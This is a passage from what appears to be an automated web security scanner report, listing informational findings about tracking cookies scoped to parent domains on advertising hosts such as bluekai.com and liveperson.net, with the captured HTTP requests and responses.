Referer: http://www.creditcards.com/oc/?pid=22125109&pg=17&pgpos=9
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lsclick_mid2291="2011-06-17 11:51:31.045|EhraRx8K_BE-PWS2r5T7Tzgjw3IqElyKzA"; lsn_statp=XJG0rhcAAADvdDvwMI7FTQ%3D%3D; lsn_qstring=EhraRx8K%2FBE%3A224261%3A111326932011e70624170645597158; lsn_track=UmFuZG9tSVYYZ0JtvqPgV98x%2BGpPYmQf2xmZZhO0VWwmLHYAs1CSN681TgW7DEgO3okZTia6ZR29J%2FWPISuigg%3D%3D; lsclick_mid1335="2011-06-17 11:59:59.712|EhraRx8K%2FBE-figIFch8YIne3Ub0J2Tk5g"

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
Set-Cookie: lsn_statp=XJG0rhcAAADvdDvwMI7FTQ%3D%3D; Domain=.linksynergy.com; Expires=Thu, 12-Jun-2031 12:00:31 GMT; Path=/
Set-Cookie: lsn_qstring=EhraRx8K%2FBE%3A227478%3A1118b79220110c061317070b00ed04; Domain=.linksynergy.com; Expires=Sat, 18-Jun-2011 12:00:31 GMT; Path=/
Set-Cookie: lsn_track=UmFuZG9tSVYkVQ7zZ50sMP6zzgyOXYFH4NxsDcK9L89L9V6GAZUtq7w%2Fv0c5e2Gg3c6Q8Ny5aiajimfEubz9lw%3D%3D; Domain=.linksynergy.com; Expires=Mon, 14-Jun-2021 12:00:31 GMT; Path=/
Set-Cookie: lsclick_mid2291="2011-06-17 12:00:31.668|EhraRx8K_BE-Gq0WXXscoeFiJWMkyMbiLA"; Domain=.linksynergy.com; Expires=Sun, 16-Jun-2013 12:00:31 GMT; Path=/
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR CURa ADMa DEVa OUR BUS STA"
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Date: Fri, 17 Jun 2011 12:00:30 GMT
Cache-Control: no-cache
Pragma: no-cache
Location: https://applynow.chase.com/FlexAppWeb/renderApp.do?SPID=DF92&CELL=6H8X&AFFID=EhraRx8K_BE-Gq0WXXscoeFiJWMkyMbiLA&pvid=1118b79220110c061317070b00ed04
Content-Length: 0
Connection: close

9.7. http://pixel.33across.com/ps/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pixel.33across.com
Path:	/ps/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

33x_ps=u%3D7836807683%3As1%3D1305398110461%3Ats%3D1308311947421%3As2.33%3D%2C6940%2C; Domain=.33across.com; Expires=Sat, 16-Jun-2012 11:59:07 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ps/?pid=454&uid=4dce8a530508b02d HTTP/1.1
Host: pixel.33across.com
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh44.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 33x_ps=u%3D7836807683%3As1%3D1305398110461%3Ats%3D1308181160375%3As2.33%3D%2C6940%2C

Response

HTTP/1.1 200 OK
P3P: CP='NOI DSP COR NID PSA PSD OUR IND UNI COM NAV INT DEM STA'
Set-Cookie: 33x_ps=u%3D7836807683%3As1%3D1305398110461%3Ats%3D1308311947421%3As2.33%3D%2C6940%2C; Domain=.33across.com; Expires=Sat, 16-Jun-2012 11:59:07 GMT; Path=/
Pragma: no-cache
Cache-Control: no-store, no-cache, must-revalidate
Expires: Thu, 01-Jan-70 00:00:01 GMT
X-33X-Status: 0
Content-Type: image/gif
Content-Length: 43
Date: Fri, 17 Jun 2011 11:59:07 GMT
Connection: close
Server: 33XG1

GIF89a.............!...
...,...........L..;

9.8. http://sales.liveperson.net/hc/32528459/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sales.liveperson.net
Path:	/hc/32528459/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

LivePersonID=-16101514677756-1308311975:-1:-1:-1:-1; expires=Sat, 16-Jun-2012 11:59:49 GMT; path=/hc/32528459; domain=.liveperson.net

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /hc/32528459/?&site=32528459&cmd=mTagInPage&lpCallId=126605105586-572009782772&protV=20&lpjson=1&page=http%3A//www.capitalone.com/smallbusiness/cards/venture-for-business/%3FProductCode%3DSB5%26external_id%3DGAN_1000002114_SBCGAN_j31125666k112308_631528251&id=7998289160&javaSupport=true&visitorStatus=INSITE_STATUS&defInvite=chat-sb-sales-english&activePlugin=none&cobrowse=true&cobrowse=true HTTP/1.1
Host: sales.liveperson.net
Proxy-Connection: keep-alive
Referer: http://www.capitalone.com/smallbusiness/cards/venture-for-business/?ProductCode=SB5&external_id=GAN_1000002114_SBCGAN_j31125666k112308_631528251
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: HumanClickKEY=6682965583658191868; LivePersonID=-16101514677756-1308311975:-1:-1:-1:-1; HumanClickSiteContainerID_32528459=STANDALONE; LivePersonID=LP i=16101514677756,d=1305377522; ASPSESSIONIDAQSCRRRS=PBNCLIECMNLIHJBBIOIPPANI; HumanClickACTIVE=1308311973932

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 11:59:48 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Set-Cookie: HumanClickSiteContainerID_32528459=STANDALONE; path=/hc/32528459
Set-Cookie: LivePersonID=-16101514677756-1308311975:-1:-1:-1:-1; expires=Sat, 16-Jun-2012 11:59:49 GMT; path=/hc/32528459; domain=.liveperson.net
Content-Type: application/x-javascript
Accept-Ranges: bytes
Last-Modified: Fri, 17 Jun 2011 11:59:49 GMT
Cache-Control: no-store
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 188

lpConnLib.Process({"ResultSet": {"lpCallId":"126605105586-572009782772","lpCallConfirm":"","lpJS_Execute":[{"code_id": "INPAGE-DELAY-10", "js_code": "lpMTag.lpInPageRequestDelay=10;"}]}});

9.9. http://tags.bluekai.com/site/2750 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tags.bluekai.com
Path:	/site/2750

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

bk=gUoquR7lj5Zd8JkA; expires=Wed, 14-Dec-2011 12:33:36 GMT; path=/; domain=.bluekai.com
bkc=KJh5Naa/DtWDOdedqPFmkjBYYo31/emZ+QGCuYsH7QptmBZexyhEiUhDJ96PbzDxVosYuetWFQiZfvAKOGN9KryoYFJaWTDCpkYZGIizKdKNKXfefFMh7UmIzIf2fL6W9cXVKB+HMJ6YAYswJSVfFsVw7QcI7gSycils9Ci6lEX1TRSq6Cckoo96Nl4q9IZNoX9JtRwc+o5YpFTKJs6Fvr5c/Jhf/Otb3BqcSSftRLy3pHKk4+INXqyP3YjFcysoBZK54q2jZFLl8Fy625BhydsTe0QA3WS6fsbF5J4n24ufudmKlpZmHHelLELejjXWQKHlYpUAEF0yt97km1Vfp4VBrPbXPmXSzFjIFsbXV6UgihRvKXz642MtCtA/zfhhkooI4y7/Agkd2GG0hhLF62foBO9ImvEXEJe5IA0STTldP9ON4zY2C6TIITG0hhFfvwdn1FYPXG6dvTX+ue2u7o0UUoiEl7G+F4NvI340BIUSk2n7kvrDFz3MvKZCsK7Xkwu+sZZIUXSg8wPw21bbwv2XrDbSXT6MjTcoqQr84BAe/KAIjzTlf3cnZI498FbCdUlovj6URlXkLWc7GlcwiV5weA+wvcmIXuh2E/Jqaoo35dXfGcy2nwtqpo4qOXo88uz+67fkyClo4KP4037q6iIDKEfMu7GKcIkXU7Y8563b4DvSdTle2eT7gkgYrU38pFLjdyBzGlah; expires=Wed, 14-Dec-2011 12:33:36 GMT; path=/; domain=.bluekai.com
bkst=KJhBAn2gNWWxhqz/snyzWxxqHupuqopj74taCRxAcYjz8/CQDrfm4gIQy3kaevHmgfSoqnxPguVxd9DtRoku6NAJ6zqjLXkVy8Lwfft5m4Uk3oJlIF7fKWT50f0AQitIxWTbKhz6Jj56jYv5QtcsbGph85teFXv4Yc2afDt4EjdFEpILBKk6jCcfTM3qVDKqguqZgswBxR4K5Bxkf0Z0I5xiFNbtInwzncbJ5aNau+8jXeRjjTNpW4prbpBjny8STq4lspGKBBuuOlY9comhAuyipFdX/KFexu+e+D/GccVUx+s/AqV+cK+x/MrVY/Z8mdFdKIaF3+VP2KlNgDzwd5gM0Kgn6Dc54pc3K4H6LbTzpHG1adb7siO6CoyO3VACrL7184jx3xDPUdsEFz7sKs57Rd4sgUwHFTkIHbsJ+GHA9Y6Q91ikvyvnpnTl8/z4ZX48LeVF0Kzx351h9VGv+5moPo7bCJZnHR5WF0IWFl4+6C740slI9VrbKQA=; expires=Wed, 14-Dec-2011 12:33:36 GMT; path=/; domain=.bluekai.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site/2750?id=73b6b0a9-a657-4959-8c44-a72cc1d5226b HTTP/1.1
Host: tags.bluekai.com
Proxy-Connection: keep-alive
Referer: http://burp/show/7
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bkp1=; bku=cQ6991Cf6W6Oh0NB; bklc=4dfb282e; bkou=KJhMRsOQRsq/pupQjp96B2Rp+eEV1p/66E101UbZ22LUv1790oYUsJIj/LBQjsOGSsO3SsoGSVHrRsaZjsCAjQ/AeY6BnxhQikZ9iGkHYyYfRHok; bkst=KJhkAnNn96Wxhqz/vYScQZYMi/U+brp7fV/C/xZOuJuQRanKf5bOYksnsnYtPN+fqDPgWzh4RYmVkogmuk9qjt1MrBUyZX5fqb59fiR/FLc+zfB9f7WK/flrU7Kdlft34iBbI/XsiOSJ0PmPizHH/hJOoU1JBEbJSjppEsjVStAzFyZrMlX+FoSYhEriSVvAND39aoRgyjD0Ger7nfiKn/jm8b+Otiys3j9Sx9cEpcJCosY1MqI2TF3As1o/f0am7SsjMPwvZcaDI1pHmePmmRp9ZmUHa02Hw6L385oZqUNgxNKlV8UeIgcFc2HpP225XIVnDRmG2JFvxEnaoKv9BxDRNH38pWKWk/Q8zMr2P3wjqMzb1lBe8Wd/ayMMH3uh8z9W19O//4W1csv7z08N5O6XCkaGf3NmRi1pSiyyvZm4DKL2EgkkiDLaD6pvM6dDg6p2mK1jlrRcEdhp89==; bko=KJ0ETtBQVmc0t8KaRH/q9X10//r4GP9xyZJiSmJQRweDOfWZzLBR0AONhdPIIp/07mSYLUR/xNC1ev3XWJRQQpzFEWy50rJ7iOVWLJQjp7JefsPkYs57RWiPdyD6Hx5G0G2lwTWLwVRsCGr4FFo01M995VQOVRy15TYZb1iXOnG6EQMYRZJ/C/3h1rxeEVaIXH0GnGscQucr0EmQcPoyNiPIY9+GO0I1Jx76IqFQV6OjVu9gRmBNG1A9ZnCccx==; bkw5=KJ0akPN/PaWxhddU3bklgxpXieRi/0NNl5lXxOwDNUYPdz9kYQLi1XtKIGvY0Wnn3OTMz1rc7oqz/cG/x6vAiYJbe/gGNqvcGYQNGi5g8obf7WBfnilLrzF27jApX8IjLI1P9vy6ncg6Rt97RvexZgLBeaqu3T/6U+mMsj5gZRhb4a8QVYWCUcP/5He/38cK2rBExcoq5zi39jEiuaiuK+LIO4TRKBF1S8bNI5Sd8JNYa7N9PtWSCX7q5F03O6y7BCcc3vzZ3BFazEbb8WjZF/RnXjmlhlD0+tbXg8zj+9SWeKFHQV5Bo/1Zs7s0mYUq/7mv77y59I3/UiW0Rx/KNe3WwKLJ7bR7c/sKPn+bXfLupkBwmm3NeVGBEpGN4wA9IBO/gXMsH6oUTUinMmOSA0YLxxmI+XCpqiMWCtIvpu0H1JWlIqxOfqLaXjRekutLbOu3zG9i7/G9rDiSwtCc6Fh+gyV+FBj+1Pe+fmU3kIWzfztCs7KmA62gK9/RSrUpodYEKeWYcUhv6kyS9RTojeNtmVuj09ZagWmUxdM16ygjQ/1mVusq1yGoxq2emmSnYikag61TMfWtGx6EwNRbC9nEPmrcqPnoH7hLkloKeyWMs21R+3FpJuEg2MyAkKfaGD8oX6/CKtaN0Co157mPD8MwR5lvTMnE8V8oAXOXVwqrDaM6m6K2YDddufig2RufVAdXg+TT6N5CzjL2X59ejX1062AK6P1l0VRqO7oAEhU66g5G0Lb6/zJjEI19dPfM2n7GiDCWp7/MXiwbV0ofP0jwwKWX2zEFbGlpc/0vwW1Do/UPivpqxkEzqYU6t/m83npj2LVW+I/5ccLyoLXQKNzZ9plCewEWfI3B1dQEW2wJu7ryWm1NSUbtjpCf7idRv25OpvsRnec7u5BS8cD5gUNhGz+VrgFvWRpnIi5LAgJJnQJvw227RApq1H3RM9FaIJTRbhwHzX2D/JGxdyUz18EeDPbUpFBbp8rjpMrmOD27exRuKGtp5tD6No1jgKK1h7gYs+INuzgr7l/1t5WDVQSwgl/wdQP4QaRq; bk=lOmmHG7lj5Zd8JkA; bkc=KJh5NW2/acWDOdeF8sf3kCrvanu0OvZhoSLHOODA63kQM0+fDvxGWbkMW3bi/kt1GY63WmAu5Ccby8f3WYuO5myDOUUJHsWHN0CVkbnl5F3NXltcZKceKIdllLpXjgJfQeIfwuy70bA/gi1gFMGvX+ar5LvT/XqrefagycTSXdFPRveiOKwiEj9nk2ih9I0UWXOmh54XdWAQtN+mK5JU7jH87duDDf+xilliNP29gLKw30IzRmFXpk34kd7m5dZKe9mkMv0HgcGyhmTwratmLpJ462otvGa6VB6U3UG7YQhXX+9LfLB7E86hEA+I6n3ILbbUdg4KWHx3dEErFBTQXxDwoRN+r42ThS2Zx5jX80DjIFkORWZLXbr4sVrIXbn6prKOIBjw3UXEPjI8h5jX82INxmLxzmbvUbXIqvp8pZso4fX/4JOb8l4sTdwLWKwom4qX/dqv9dq344RUTTdsn44RMzRBhicMq/82Tybfm11IlLpV8IUXxgpXPgfjQmK1efV0+5T8LHKRc4HxvaR2cs1wsVr2X6D8wqTB4BFD2INqTX8N2zOUtHdcBFhX24xGKXoRb8640LXArrvCGtU2F0ws7Ucte2k4xVXjaTlcEgwgMWr7tJFslTNpJ2klM4UI7mFk4q0VdqAdT1LpfBTo+kb5Td/2j2GXz3s5T2gwIu2oeVS9; bkdc=res

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 12:33:36 GMT
Server: Apache/2.2.3 (CentOS)
P3P: CP="NOI DSP COR CUR ADMo DEVo PSAo PSDo OUR SAMo BUS UNI NAV", policyref="http://tags.bluekai.com/w3c/p3p.xml"
Pragma: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: max-age=0, no-cache, no-store
Set-Cookie: bk=gUoquR7lj5Zd8JkA; expires=Wed, 14-Dec-2011 12:33:36 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkc=KJh5Naa/DtWDOdedqPFmkjBYYo31/emZ+QGCuYsH7QptmBZexyhEiUhDJ96PbzDxVosYuetWFQiZfvAKOGN9KryoYFJaWTDCpkYZGIizKdKNKXfefFMh7UmIzIf2fL6W9cXVKB+HMJ6YAYswJSVfFsVw7QcI7gSycils9Ci6lEX1TRSq6Cckoo96Nl4q9IZNoX9JtRwc+o5YpFTKJs6Fvr5c/Jhf/Otb3BqcSSftRLy3pHKk4+INXqyP3YjFcysoBZK54q2jZFLl8Fy625BhydsTe0QA3WS6fsbF5J4n24ufudmKlpZmHHelLELejjXWQKHlYpUAEF0yt97km1Vfp4VBrPbXPmXSzFjIFsbXV6UgihRvKXz642MtCtA/zfhhkooI4y7/Agkd2GG0hhLF62foBO9ImvEXEJe5IA0STTldP9ON4zY2C6TIITG0hhFfvwdn1FYPXG6dvTX+ue2u7o0UUoiEl7G+F4NvI340BIUSk2n7kvrDFz3MvKZCsK7Xkwu+sZZIUXSg8wPw21bbwv2XrDbSXT6MjTcoqQr84BAe/KAIjzTlf3cnZI498FbCdUlovj6URlXkLWc7GlcwiV5weA+wvcmIXuh2E/Jqaoo35dXfGcy2nwtqpo4qOXo88uz+67fkyClo4KP4037q6iIDKEfMu7GKcIkXU7Y8563b4DvSdTle2eT7gkgYrU38pFLjdyBzGlah; expires=Wed, 14-Dec-2011 12:33:36 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkst=KJhBAn2gNWWxhqz/snyzWxxqHupuqopj74taCRxAcYjz8/CQDrfm4gIQy3kaevHmgfSoqnxPguVxd9DtRoku6NAJ6zqjLXkVy8Lwfft5m4Uk3oJlIF7fKWT50f0AQitIxWTbKhz6Jj56jYv5QtcsbGph85teFXv4Yc2afDt4EjdFEpILBKk6jCcfTM3qVDKqguqZgswBxR4K5Bxkf0Z0I5xiFNbtInwzncbJ5aNau+8jXeRjjTNpW4prbpBjny8STq4lspGKBBuuOlY9comhAuyipFdX/KFexu+e+D/GccVUx+s/AqV+cK+x/MrVY/Z8mdFdKIaF3+VP2KlNgDzwd5gM0Kgn6Dc54pc3K4H6LbTzpHG1adb7siO6CoyO3VACrL7184jx3xDPUdsEFz7sKs57Rd4sgUwHFTkIHbsJ+GHA9Y6Q91ikvyvnpnTl8/z4ZX48LeVF0Kzx351h9VGv+5moPo7bCJZnHR5WF0IWFl4+6C740slI9VrbKQA=; expires=Wed, 14-Dec-2011 12:33:36 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkdc=res; expires=Sat, 18-Jun-2011 12:33:36 GMT; path=/; domain=.bluekai.com
BK-Server: c45a
Content-Length: 62
Content-Type: image/gif

GIF89a.............!..NETSCAPE2.0.....!.. ....,...........L..;

9.10. http://tags.bluekai.com/site/2939 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tags.bluekai.com
Path:	/site/2939

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

bk=tjN2bLOLq2Sd8JkA; expires=Wed, 14-Dec-2011 11:58:29 GMT; path=/; domain=.bluekai.com
bkc=KJh5NWa/asWDOded8sbgkCraani0OJ3hjPLHOYDD6AWvkATgKpYAv9FFugHvi7HHCnSGxvHnbWVGjW2NYJH9m7GvCqoAAgY/ShugRFEKEkXfdlKRsU8XfdIIqtSIZKyIT12KeyFJ7PxWN8WPlI6cIzxj5LvTBzqrYgsgyW8vd+Uk7PxP/MQQUF6B81uKNvZF7VBgwt4BEX4X2K8OH2kEhLUf/O5rLVBctc7JUpN5bEXfYsy74EX19bV1gecQfCYfvI9Vmu8Jd+YwgPxYbqYbLfqifuCyRXkeFqQE08TbR80VI3YNFfwtuddg5h0aX7ybfghVJIBEcAggVlJdXqn4MRvL2zfpLrQlezYXVBKF4ZtL2zTp17zIeXxl467IxNE52Gi+2zbfWSY8OfC0hXIgZT0NlMALIDXpyvnA7EXSe600KTtcJ2iEn2Qgp2igE2k4MeXqBp8Ccpur1yTjjlwLF7atzRH2+ob+pXF8gUCCEgfHQYK1MpSpBKIzt9I157LGaYrIatwlssFKISSzUGTOlpq644FVzK43srYgf/IEblb2Kgi4wVuLKK47XFm/g7CGqPpffNgMDlctE2k4xVXSaT64UsHUs8zrLeK1FhF7pg14sIF2m54/IlQFIdByyn5ctmNeqn6bhIPfpCpp0/DVc+487wXYrchQyy==; expires=Wed, 14-Dec-2011 11:58:29 GMT; path=/; domain=.bluekai.com
bko=KJ0ETtBQucUXfzF11/ZBQVsYdV24UGRZeQRsEdl4FAy1WfkCnsVQfcs2lfb1evK8Rvy5yC9VWT13nTxk0meBYhBECfnTsV/a/uhZCgwzWORnxpQf6af8U6OE5/YZdcMlWXQ3a/uTCRkOM8ZOTKv7gfbze9h91u6Qi8cCe+9XcjZUxnNhxC9VW61iP/0P/H2GcFmn86ONYEy1ecaw7Qa+6TvpnFaeVWeqKsWLuSewlyU49Lgv9kAOsbXeExR9WE2s4x==; expires=Wed, 14-Dec-2011 11:58:29 GMT; path=/; domain=.bluekai.com
bkw5=KJ0akaN/DtWRhddcGp7wp9pXiOjHARjpS6L7nis5hrRTtl9UxxVHtjj52xDa6RGIMmG09k5K5eP0xUxHCGH/WAH6sHEHgVWUxPaSHa4VX8plMw4xl+cQwsKzldmXpdzfNQq9PzHgKFUiSiKQ/K4tKRYLQ6HyluR5xVePu8I1/kRNGOkcRAp3MnZfxJKkPxedBnp+jPkMqngpnl77/WLIRviri1B6t7qXbQJ6mynCnK4tOkPSc1tEu8U/MWKgxcquSDd2/QmeUksXf8/j29VWeVz2Q/DKGWRHM49LFJHqknpTbqksjW/clmi6iqziTEwPCwtGuD4a60ocyBZLfUqtTbE5M8KwQ9XCIAxtw3oSmTbcojXqwRJyo+lTaoS7lU/xcfTbqsSJh/iX3uDa2mXVhB1v+/V8qkBGgyn3zzGW3ocUF8BsUF2+uPz4ud2ZeHttn7K0OK5/+TgbBUiapMu0W6YZMdNwTu4hHQxstW+KUhTcMM7/mr000x3HWyfuQYsqL1dEeg/KOtl0QtpmmWQE2+rWRffG/1t/tTEpKnhcNMmWMdt0SMzMywis/gJVep8cjB2KHsx2TpQ6vs6ZG20h9rSgr9R+vH7NukESZJiw0V7nh1uWzZyqX40dCm5xEUQmNRuM4CDEBXRpBfNyBiSM7C6VDlYqqnjC5aCmQu+mEdtDkDIl0qkBTye2UtBworiiSzG5YbcVPBXH8P3kqBuWLNWEpZRL/qvJDYQsPA686TLJzUL66VLF8Cn02+iUavzNfr9/Q6kN7mPSoEMPCmBDWTfpENnLOk4BMzDA0fpI053QXZtbRWZr35QY155i0dvbLzu0QKH/uZudHK58e3jAn21VvPiAsQccOe8AGANq1V3RE/ZbXJjKcCcHzdIl/oWV+0glwI4IzoEkX7ZVeppLjjgAw5rY+XSn6qubArPSoD330Rp08a/kfNrAR1NYvpvVppoeTfP0lePd9jrOJTD=; expires=Wed, 14-Dec-2011 11:58:29 GMT; path=/; domain=.bluekai.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site/2939?ret=html&phint=keywords%3DPoints%20Rewards%20Credit%20Cards%2C%20credit%20card%2C%20reward%20credit%20cards%2C%20credit%20card%2C%20Credit%20Cards%2C%20cash%20back&phint=__bk_t%3DPoints%20Rewards%20Credit%20Cards%20-%20CreditCards.com&phint=__bk_k%3DPoints%20Rewards%20Credit%20Cards%2C%20credit%20card%2C%20reward%20credit%20cards%2C%20credit%20card%2C%20Credit%20Cards%2C%20cash%20back&limit=4&r=50781410 HTTP/1.1
Host: tags.bluekai.com
Proxy-Connection: keep-alive
Referer: http://www.creditcards.com/points-rewards.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bkp1=; bku=cQ6991Cf6W6Oh0NB; bklc=4dfb282e; bkou=KJhMRsOQRsq/pupQjp96B2Rp+eEV1p/66E101UbZ22LUv1790oYUsJIj/LBQjsOGSsO3SsoGSVHrRsaZjsCAjQ/AeY6BnxhQikZ9iGkHYyYfRHok; bko=KJ0ETtBQZsedt8KHGRZeQzaEdfzFWXBWqCCgWC+Wko5OszQbgQ5u58Gnh+GCesWh1SM0xkiYeBbX1eaNv/r4/PRxyZJZm1LBRqWyCn1p1vEvdyvSGQ168zKf76OV/Pe5hD24Quy2jQinATWOvvRaagLeBW2c8iPxq8yxC1UWA9QPRtU/O8gcdm/8Da6YeyBelJB7xBr6TvhndO9V6ejKsWLubwBlyqK9LgJ9PLesb6YE9q7tHfG=; bkst=KJhBAnNn96WxhqzxaJmQ/BQGRZsfmgw4iTVWs9vHvWcOonpqFx1PGCRhRstF+FqVGgPPdQ/qLqED5aSYtMQUsbzSlFLhfpWEfcsS6xy4UkGEqWMfY7B83MmjOm8A/gAv/KWrJoqqUsx3XXRGaXH2yEXHwX7bFSwKXSelF4oe6Q5JzXyoqfxW/flxDZM+ycxFUXZKvHPoNhLatiGP3axsx91S2W/bJHahbFtBf/+uDDqaYeRBMZ4KoCpHOu8MagCBU5YO/iCZqPpIkFQaP3FV5IFqKp+Zzf25mttzhXaJ/yIBybNRFHAl3JEdDQDGNWJo9PHEQ+w+XjVkYZBk8LfYxqd5qcDbpKfXTGM6j2vUsxG7DILaG9xWQOuuiOO/eiRU0kEriCrMu+WXKoBRopnrwYOUBZqzh6CqfMWJ3DuBu7NIWqXIIIIBPduqU6DWjfz=; bk=eC9VwtORjebd8JkA; bkc=KJh566+/sNWDOrOdt3xI3CsnVsQAYwPOgvSvDvCYifixagv1jva/ullQUiksDjara1aDPOeoo+iBT/mLtGVQYmnuPqaxBp8xYs/Lukx37owhZMk71EBXlww4N2yqKxyW3GcFqbIeaG9XXrWaWcUT4SN6i0F+Yw7ZARUBycUxMSSDmlLCUaW+fPKr2Wopd6TdCwxwgplKQpFwv0zIxpMID5gfPeosIUzF6I+jsxYr9gRclD90EcFizJ+nrLUC17gKDwfJ6VUxM8Yqlj052oDcSBthDWOrhCIncPRmDqlElnXh2hKbbbXzX5HTls8X7WF+XhSuJ8K6wkdvw6zCpwUsbpEooV49mo77pN8D87gMOHGfaQBXjIKDUdVybf2/zflhdy0Qo9BGqn4pfm4vUsdLoFpV9gOBKK1B84T8bVfkTP7orH7odu7oy67oFX3dkRrIurzg803fkYBHbj8hbzu/5WtOBmIUXEJ8zTlrZ1mp0LDk6oyl2rz9Gt6VTGZ6rfpucz3zBd89gt2MyBTodtdqlsbzZxUL6FkTzVnULT5foRKDmVXXEj44LtICLrMTl+7vPEfo4luI7e8EEiMlNDk7vi54u8X3c0CcU6kwvwwbMnwG4d0iXN7GXvzHbRRCS4TSIIQIC6L+TUijqm4hMsXOmxOQ59==; bkw5=KJhNkW+GWNWDCFdoVJ+1S3lxChQHaP+JZoiRoexsqsmkSzAeLheDMqDZNoDFDOYMIviGuhWSpzJP1OcWCPuvaBsBaJKY/ZTg5uWGVCPhaEN7fGxfZJ+9pGHX82fp72512xayPwsScAmTmQOGvnCXqiOF/laz+TQ7YBuX2J5HHD6er7WAyzHonByax3jUs4pHXcS/qSrhXzfd8JtBnwr9DVzPCIZtq4Q597HnQRCVzcZevi2VXIHu1pn7No3xcUEqDfd/yvecsBbcj9ShQeMeVRdQ8uex3k9M/GLGMu43D4p6FDjAHQ5zsnY/+07Cm2VWTbiJoIk+gsOBtafNANqPUp6YwAEGnpgMG2g6TlCDl7jMDOemJThFDEAH+tpWCbIt1dBWWAEK+JWeC7zJTrTaI3Jz7HnbVTOt7WGY3NeDF8BcD42MVAK1gUIEOGdk0dl3yE70qSsrfnkY5hg8su9UTdQkdYnKiz9/H073v2w91H+ji86VIDcAC/N6RBxicwm6MSpe/RFXoeB7qvxnO0pYZidSuezZn1J8wBT+bh7Ohtaj+j+hRco2aUZpO8dMLMrpR20U1oblzvR2sSA+kh9phUWtTWPYEGbSXmuGYDImZgYYhRERXVzrKrOLx33Kchz5FDN7+ZJ0UcqD1Dc42ovomopAeYGTun2UVN1ZmoJ103t/GYtolrosglGtSLnj39k718DutzHJiGaSDLf7DAgLKhz22Z/CJ4524NgzNgZ5axqESotBU7V5SL/bNRHNdAtnmKK3rqYDjkFDw87q6nQja6pnBHDEnVjDqWhHB8qj5oeBjMMf1MqgFs1Otpx2jvJPEYDSjM1iK2bg0drWHrf0a3u0TZlcUubTFChkrlvKfx1lSbIxFVK5Te7lRMvggkKMPfNKSMv7FnkKgdLZvjL5f6UmMmA6BaTTt2FCcf+hssW=; bkdc=res

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 11:58:29 GMT
Server: Apache/2.2.3 (CentOS)
P3P: CP="NOI DSP COR CUR ADMo DEVo PSAo PSDo OUR SAMo BUS UNI NAV", policyref="http://tags.bluekai.com/w3c/p3p.xml"
Pragma: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: max-age=0, no-cache, no-store
Set-Cookie: bk=tjN2bLOLq2Sd8JkA; expires=Wed, 14-Dec-2011 11:58:29 GMT; path=/; domain=.bluekai.com
